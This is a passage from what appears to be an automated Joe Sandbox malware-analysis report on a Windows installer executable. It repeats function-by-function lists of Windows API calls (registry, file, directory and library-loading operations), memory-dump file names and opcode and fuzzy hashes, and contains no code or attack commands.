                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$AllocFreelstrcatlstrlen
                                                                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                                                                • API String ID: 3292104215-1824292864
                                                                                                                                                                                                                                • Opcode ID: 76e1c53c6065f8e9472f18b9dfeefb14709868848a4ccda9946b373e0273bbaf
                                                                                                                                                                                                                                • Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76e1c53c6065f8e9472f18b9dfeefb14709868848a4ccda9946b373e0273bbaf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397863658-0
                                                                                                                                                                                                                                • Opcode ID: ffba938f7f9a9646bc05872a2a2d1d1e7365e509dd4e3e586e1c2ded03845b65
                                                                                                                                                                                                                                • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffba938f7f9a9646bc05872a2a2d1d1e7365e509dd4e3e586e1c2ded03845b65
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405C01 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                                                                  • Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DE3), ref: 00405C1C
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C24
                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C3C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1655745494-0
                                                                                                                                                                                                                                • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                                                                                                                                                                                                                • Instruction ID: 0274c5225d47ddc366315f3a2fda4b694ad97aa72442a0e2fcdbaf00fd257d87
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4E0E53110CF9156E61457309E08F5F2AD8EF86715F05493EF892B10C0CBB848068E6A
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                                                                • Opcode ID: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                                                                                                • Opcode ID: 86975ae7e55868c6fa7f0a653ee38b5bdebf79f927548a24dbd204ed482989db
                                                                                                                                                                                                                                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86975ae7e55868c6fa7f0a653ee38b5bdebf79f927548a24dbd204ed482989db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                                                                                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1375471231-0
                                                                                                                                                                                                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

